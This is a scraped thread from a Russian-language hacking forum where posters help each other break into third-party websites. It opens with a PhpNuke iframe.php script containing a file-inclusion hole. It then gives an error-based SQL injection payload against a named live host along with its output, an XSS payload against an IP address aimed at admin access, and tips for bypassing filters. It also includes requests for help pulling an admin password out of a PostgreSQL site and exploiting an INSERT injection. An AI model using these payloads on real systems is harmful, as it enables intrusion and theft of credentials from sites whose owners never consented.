iframe.php PHP: <?php /************************************************************************/ /* iFRAME for PhpNuke /* Copyright (c) 2002 by Xavi Gil (dgil@tinet.org) /* http://www.desarrollonuke.org /* /* USE: iframe.php?file=URL /* /* This program is free software. You can redistribute it and/or modify /* it under the terms of the GNU General Public License as published by /* the Free Software Foundation; either version 2 of the License. /************************************************************************/ if (!isset($mainfile)) { include("mainfile.php"); } $index = 0; $height = 600; include("header.php"); OpenTable(); if( substr($file,0,5)!="./../" && substr($file,0,7)!="http://" ){ include ($file); CloseTable(); include("footer.php"); } else { echo "<IFRAME src=\"$file\" width=\"100%\" height=\"$height\" scrolling=\"auto\" frameborder=\"0\">"; echo "</IFRAME><center><hr size=\"1\" noshade><a href=\"$file\" target=\"_blank\">$file</a></center>"; CloseTable(); include("footer.php"); } ?> говорил же,
Konqi, спасибо. Я вчера таки спать лег )) А можно еще вопрос? В посте #18193 Tigger пишет: Слово union взято в комментарии, почему же оно выполняется? И правильно ли я понимаю, что на сайте стоит фильтр, не позволяющий выполнять "union select", а вот "/*!union*/ select" уже не подпадает под него?
ggaffoltern[antigoogle].ch/index2.php?content=index&path=content&print=2 Опять же инклуд. Как организовать читалку? --------- PHP: http://imakefood[antiggole].com/?sw=1[sql-code] WVS-ом насканил. Помогите раскрутить!
есть логи от mssql вида: INSERT INTO таблица (.....) values (.....); есть ли прога, в которую суешь эти логи, и она конвертит их в mysql ?
http://search.kgn.ru/?text=ololo Code: Warning: include(http:///?text=ololo) [function.include]: failed to open stream: operation failed in /var/www/search.kgn.ru/index.php on line 29 А самому не додуматься что тут "не так"? Просто в конфигах не прописано к какому хосту обращаться для осуществления поиска. Поиск там работает не на самом сайте а через сторонний сервис и там даже написано "Поиск осуществлен с использованием Яndex.Server.".
Имхо, это не скуля. Нужен админский доступ - заюзай XSS лучше Code: http://217.8.80.55/?m[search]&search_block_num=<ScRiPt>alert(/Its XSS, Baby/)</ScRiPt>
Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая: там фильтруются скобки, а вы навернека первым делом встевели что то типо version() вообщем вот ваше начало: а дальше хоть немножко напрегите свои извилены!
Code: https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and' version(): 5.0.67
Доброго здравия форумчане! В общем ищу где можно почитать про PostgreSQL Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю, Помогите убедить сайт. Leon2k Можешь обратиться в личку, всё что знаю расскажу!
Возможно, придётся поработать с выводом, чтото вроде Code: unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71) где %Visible_Col% - выводимая колонка в запросе всё зависит от случая
insert into помогите с injection запрос вида log.php?ver=1.0.1.130' Ошибка при занесении информации в базу. 118 ******/log.php You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25 INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" } все параметры строковые, можно как то вставить union+select?